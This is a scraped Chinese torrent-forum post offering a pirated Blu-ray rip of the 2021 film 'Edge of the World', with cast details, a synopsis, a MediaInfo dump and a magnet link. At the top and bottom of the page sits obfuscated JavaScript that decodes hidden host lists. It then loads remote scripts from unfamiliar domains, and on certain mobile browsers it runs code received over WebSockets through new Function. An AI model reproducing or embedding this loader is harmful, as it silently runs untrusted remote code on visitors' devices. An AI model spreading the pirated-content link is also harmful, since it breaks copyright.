王公[简繁字幕].Edge.of.the.World.2021.BluRay.1080p.DTS-HD.MA5.1.x265.10bit-bt9527.cc 10.88GB

版主小s 9天前 196

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 王公 / 白人拉者 / White Rajah / Edge of the World

◎片 名 Rajah

◎年 代 2021

◎产 地 美国 / 英国 / 中国大陆 / 马来西亚

◎类 别 冒险

◎语 言 马来语 / 阿拉伯语 / 英语

◎上映日期 2021-06-04(美国) / 2021-06-21(英国)

◎IMDb链接 https://www.imdb.com/title/tt3006472/

◎豆瓣链接 https://movie.douban.com/subject/27036090/

◎片 长 104分钟

◎编 剧 Rob Allyn Rob Allyn (id:1328929)

◎演 员 乔纳森·莱斯·梅耶斯 Jonathan Rhys Meyers (id:1012518)

多米尼克·莫纳汉 Dominic Monaghan (id:1036320)

拉尔夫·伊内森 Ralph Ineson (id:1108378)

汉娜·纽 Hannah New (id:1337555)

何超仪 Josie Ho (id:1014212)

博朗·帕拉雷 Bront Palarae (id:1370152)

拉欣·拉萨利 Rahim Razali (id:1295309)

阿蒂卡?哈西霍兰 Atiqah Hasiholan (id:1318979)

威尔·贝茨 Will Bates (id:1448747)

◎标 签 传记 / 历史 / 剧情 / 马来西亚 / 英国 / 2021 / 美国 / 乔纳森·莱斯·梅耶斯

◎简 介

英国贵族探险家布鲁克逃离了丑闻和维多利亚时代社会的束缚,去探索19世纪40年代婆罗洲的野生动物。布鲁克爱上了这个热带天堂,与海盗和苏丹的敌人战斗,赢得了砂拉越王的王冠,在那里他统治着一个比英国还大的丛林王国。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 181135030602796155094162944810773680515 (0x8845568356405658E7574E5A19C09183)

  4. Complete name : Edge.of.the.World.2021.BluRay.1080p.DTS-HD.MA5.1.x265.10bit-100[email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 10.9 GiB

  8. Duration : 1 h 44 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 15.0 Mb/s

  11. Encoded date : UTC 2021-11-22 02:18:12

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 44 min

  21. Bit rate : 11.1 Mb/s

  22. Width : 1 920 pixels

  23. Height : 804 pixels

  24. Display aspect ratio : 2.40:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.301

  31. Stream size : 8.09 GiB (74%)

  32. Title : HEVC, [email protected]@High, 24/1.001 fps @ 11126 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x804 / interlace=0 / total-frames=149760 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio

  43. ID : 2

  44. Format : DTS XLL

  45. Format/Info : Digital Theater Systems

  46. Commercial name : DTS-HD Master Audio

  47. Codec ID : A_DTS

  48. Duration : 1 h 44 min

  49. Bit rate mode : Variable

  50. Bit rate : 3 657 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : C L R Ls Rs LFE

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 24 bits

  56. Compression mode : Lossless

  57. Stream size : 2.66 GiB (24%)

  58. Title : English DTS-HD Master Audio 5.1 @ 3656 kbps

  59. Language : English

  60. Default : Yes

  61. Forced : No


  62. Text #1

  63. ID : 3

  64. Format : PGS

  65. Codec ID : S_HDMV/PGS

  66. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  67. Duration : 1 h 34 min

  68. Bit rate : 29.6 kb/s

  69. Count of elements : 2261

  70. Stream size : 20.0 MiB (0%)

  71. Title : Eng/SUP

  72. Language : English

  73. Default : No

  74. Forced : No


  75. Text #2

  76. ID : 4

  77. Format : PGS

  78. Codec ID : S_HDMV/PGS

  79. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration : 1 h 37 min

  81. Bit rate : 32.3 kb/s

  82. Count of elements : 2456

  83. Stream size : 22.5 MiB (0%)

  84. Title : Chs/SUP 简体

  85. Language : Chinese

  86. Default : Yes

  87. Forced : No


  88. Text #3

  89. ID : 5

  90. Format : PGS

  91. Codec ID : S_HDMV/PGS

  92. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  93. Duration : 1 h 37 min

  94. Bit rate : 32.9 kb/s

  95. Count of elements : 2456

  96. Stream size : 22.9 MiB (0%)

  97. Title : Cht/SUP 繁体

  98. Language : Chinese

  99. Default : No

  100. Forced : No


  101. Text #4

  102. ID : 6

  103. Format : PGS

  104. Codec ID : S_HDMV/PGS

  105. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  106. Duration : 1 h 37 min

  107. Bit rate : 48.9 kb/s

  108. Count of elements : 2456

  109. Stream size : 34.0 MiB (0%)

  110. Title : Chs/SUP 简英双语

  111. Language : Chinese

  112. Default : No

  113. Forced : No


  114. Text #5

  115. ID : 7

  116. Format : PGS

  117. Codec ID : S_HDMV/PGS

  118. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  119. Duration : 1 h 37 min

  120. Bit rate : 49.5 kb/s

  121. Count of elements : 2456

  122. Stream size : 34.5 MiB (0%)

  123. Title : Cht/SUP 繁英双语

  124. Language : Chinese

  125. Default : No

  126. Forced : No


  127. Menu

  128. 00:00:00.000 : en:第 01 章

  129. 00:10:29.254 : en:第 02 章

  130. 00:17:00.144 : en:第 03 章

  131. 00:25:56.889 : en:第 04 章

  132. 00:33:44.481 : en:第 05 章

  133. 00:44:06.018 : en:第 06 章

  134. 00:51:49.398 : en:第 07 章

  135. 01:00:10.732 : en:第 08 章

  136. 01:09:20.698 : en:第 09 章

  137. 01:16:22.870 : en:第 10 章

  138. 01:26:40.112 : en:第 11 章

  139. 01:36:16.813 : en:第 12 章


TAGS 冒险

磁力链:
  • magnet:?xt=urn:btih:33DB82DA72F80B7548800168213E2F9E9B516696

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};